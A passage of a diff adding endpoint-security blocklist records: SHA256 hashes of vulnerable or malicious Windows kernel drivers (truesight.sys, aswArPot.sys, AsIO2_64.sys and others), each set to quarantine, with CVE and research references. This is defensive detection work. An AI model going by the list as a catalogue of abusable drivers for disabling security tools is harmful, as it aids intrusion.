+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825924Z",
+ "creation_date": "2026-03-23T11:45:31.825927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825932Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6d3bf485ac41a4b66529755df982da91a2ff1a23ffa15564474c8543980893a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37bd0067-0a80-56b6-921d-3ff13a52c4ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808101Z",
+ "creation_date": "2026-03-23T11:45:31.808104Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808113Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4edd64593884be2a0b05f6153cbe85db1f202dd2ea0eef0500e334ee30e4f41c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37bd21c0-b91b-5269-88a7-5dc486cae73f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969593Z",
+ "creation_date": "2026-03-23T11:45:29.969595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969601Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14ed216fbc7eece76ef906c7346779e06043c59edb7feb6f51809b2cb395853d",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37c2fbd8-f542-55b7-9676-697165a13aaa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479269Z",
+ "creation_date": "2026-03-23T11:45:31.479273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b895393c96cec1a7c89abe7eca0e9555da5be8e25c0a02e5e43caf37f42a9785",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37ce5d72-d52c-5096-b767-eea1aeb309d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621634Z",
+ "creation_date": "2026-03-23T11:45:29.621636Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa875178ae2d7604d027510b0d0a7e2d9d675e10a4c9dda2d927ee891e0bcb91",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37d2fe47-d3ad-5fcb-954d-e11e6fdd009d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822845Z",
+ "creation_date": "2026-03-23T11:45:31.822848Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822856Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9335a234e261df74b8d8e6027dadc918dad8499e6daee611e3ccfd052bb2a385",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37dacc43-4133-56c0-b430-4f33c7072d05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617006Z",
+ "creation_date": "2026-03-23T11:45:29.617008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f35cf1f2e0fb87a2728303091ee505a0bc546cf63dcd38178adf48477ec0f91",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37e5fbfd-ee5d-5a4e-8459-cf49957470c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473506Z",
+ "creation_date": "2026-03-23T11:45:31.473510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473521Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59aea123738499f75b7de47b34520d9f67c01f60c7bb30c1742ff9903a185a18",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37e70f98-a899-5322-b910-a32d8102b427",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147187Z",
+ "creation_date": "2026-03-23T11:45:32.147189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f882afd44ed1e9ec1875dd5e1362bb2216815a84b3709b7bb72b1206c5e7b86",
+ "comment": "Malicious Kernel Driver (aka AppvVStram_.sys) [https://securelist.com/honeymyte-kernel-mode-rootkit/118590/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37e79206-30fc-51d5-a2d5-3fe85c2fdcc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471647Z",
+ "creation_date": "2026-03-23T11:45:30.471650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37f73358-118b-5767-8460-311211886a81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487861Z",
+ "creation_date": "2026-03-23T11:45:31.487863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487881Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "947106cb13eb826fbec6ff72348076c7177139ac84509a6c01439c00b9b4fad0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37ff47b4-96cc-55a5-b49c-e317a3d9b957",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980185Z",
+ "creation_date": "2026-03-23T11:45:29.980187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980193Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e3430d5e0e93bc4a5dccc985053912065e65722bfc2eaf431bc1da91410434c",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38064c8a-fb4f-5606-9d4a-6e5a147d1c60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815727Z",
+ "creation_date": "2026-03-23T11:45:30.815729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a60d45d46e5a3dda02f41d20e5782135dd0da42c75eb9c39307bd67a7c9152ea",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3825e49a-2fcd-5193-93c6-a74b5c19900b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828454Z",
+ "creation_date": "2026-03-23T11:45:30.828456Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828462Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5354eebadca43d11288fe9dd0721974605fb6cbb3f6ea6ec6448513dfc94024",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "382dd39d-fe1f-5e7f-b8b6-93f11c077cc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825394Z",
+ "creation_date": "2026-03-23T11:45:30.825398Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825406Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8e9ae67f2ebe8986f434a22d4c175cf0ad77d8a580c26b5c04d6c183c2b8bbf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3834aaa8-32f2-5225-b81a-bf88d2b71206",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820478Z",
+ "creation_date": "2026-03-23T11:45:30.820480Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820485Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe275be26ecca4c69f1c8ec35145fcae8cd83a5cb20f7ca71ff998d91091bb7e",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3835020e-8b74-552c-9074-f275d18879b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977817Z",
+ "creation_date": "2026-03-23T11:45:29.977819Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977824Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7516dca419d087ef844c42e061a834908f34e7363577ab128094973896222c8",
+ "comment": "Vulnerable Kernel Driver (aka b4.sys) [https://www.loldrivers.io/drivers/d1441172-cc15-4a96-b782-f440bfb681e1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38385f10-7079-5122-8ce2-ce44c4f1baa5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981332Z",
+ "creation_date": "2026-03-23T11:45:29.981333Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c35f3a9da8e81e75642af20103240618b641d39724f9df438bf0f361122876b0",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3843fbd7-2154-5e62-b0fe-35b7fabf475f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612992Z",
+ "creation_date": "2026-03-23T11:45:29.612994Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612999Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e1e1489a1a01cfb466b527543d9d25112a83792bde443de9e34e4d3ada697e3",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38468b67-d59b-5ea3-82bd-501e04680e3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611167Z",
+ "creation_date": "2026-03-23T11:45:29.611169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98c86fcf018822289340d248f5e2896c41ad0f284febb741b945312ff40bdfa3",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "384abeb1-9e40-5b9b-8651-c0bf7db44e1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824997Z",
+ "creation_date": "2026-03-23T11:45:31.825000Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "563a30a08dcb636e9dd894dcfeaf36a6da3483a32275c00ec57c5c0f13916e3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3852d8a4-abbd-5d04-a5de-bda628c4d8d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827676Z",
+ "creation_date": "2026-03-23T11:45:31.827678Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827684Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59b52a009ceed6c2a9e9efc84117bfca18b0b1ed1168c28c6e6a7a1b05ba45a7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3855274c-d30b-5554-9a57-45e3cc281be5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140529Z",
